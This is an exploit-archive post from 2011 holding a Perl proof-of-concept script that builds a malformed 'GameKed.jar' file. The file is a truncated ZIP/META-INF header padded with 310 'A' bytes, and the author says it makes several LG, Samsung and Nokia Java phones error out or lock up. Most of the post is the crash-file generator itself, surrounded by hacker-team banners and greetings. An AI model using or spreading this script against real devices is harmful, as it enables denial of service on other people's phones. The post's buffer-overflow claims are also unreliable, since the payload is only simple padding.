[D] Java APP++ Mobile (.jar) BOF-PoC [Z]

2011-02-07 10:48:22
Posted by: kedans

#!usr/bin/perl

# [D] Java APP++ Mobile (.jar) BOF/PoC [Z]
#
#////-------------------------------------------------------------
# Discovered By: kedAns-dz
# e-mail : [email protected]
# team : [D] HaCkerS-StreeT-Team [Z] Algerians HaCkerS
# GreetS : Islampard * Dr.Ride * Xorer * BadR0 * Nor0-FouinY
# Date : 04/02/2011
# --->
# Tested on LG-KP500 , SAMSUNG E-250 , NOKIA N 71 , Nokia 5130c
# On LG-KP500 - My Mobile - apparition appliance errors , Ex : deterring sending a JAR file using bluetooth
# appliance errors and Blocked my mobile , or deterring employ a JAR aplication Blocked the Mobile ect...
# --->
#########################################################
## Usage-->>file created-->>load file-->>GameKed.jar>>>BOOM!
#########################################################
# ////---------------------------------------------------------------

#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n".
" ||========================================||\n".
" || ||\n".
" || Java APP++ Mobile (.jar) BOF/PoC ||\n".
" || Exploit Buffer Overflow ||\n".
" || Created BY KedAns-Dz ||\n".
" || ked-h(at)hotmail(dot)com ||\n".
" || ||\n".
" ||========================================||\n\n\n";
sleep(2);
print "[!] PoC : Exploit Buffer Overflow JAVA APP++\n";
print "[!] Date : 04/02/2011\n";
print "[!] Author : KedAns-Dz\n";
print "[!] Tested On : ";
print " LG-KP500 , SAMSUNG E-250 , NOKIA N 71 , Nokia 5130c\n";
print "[!] E-mail : ked-h(at)hotmail(dot)com \n";
sleep(1);
print "\n";
sleep(1);
$file = "GameKed.jar"; # Java File - Bo0M!
# META-INF (alpha encode ... ) :
$mif = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\x22\x90\x70" .
"\x33\x10\xb3\x5c\x99\x9c\x00\x00\x00\xe5\x00\x00\x00".
"\x14\x00\x00\x00\x4d\x45\x54\x41\x2d\x49\x4e\x46\x2f".
"\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e\x4d\x46\x5d\x8e";
$buff = "\x41" x 310 ; #Buffer
my $jar = $mif.$buff;
sleep(1);
print "\n";
print "[>] Creating the File -> $file :\n";
print "\n";
sleep(1);
open(f,">$file");
print f $jar; # Preparing the File
close(f);
print "[+] The File * $file * was Successfully Created !\n";
sleep(1);
exit(0);
#==============================================================================
#================[ Exploated By KedAns-Dz * HST-Dz * ]=========================
#[»] Team : [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers <
# Greetz : all my friend * Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride
# Massinhou-Dz * Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED ..all Dz
#-------------------------------------------------------------------------------

Fixes

No fixes

In order to submit a new fix you need to be registered.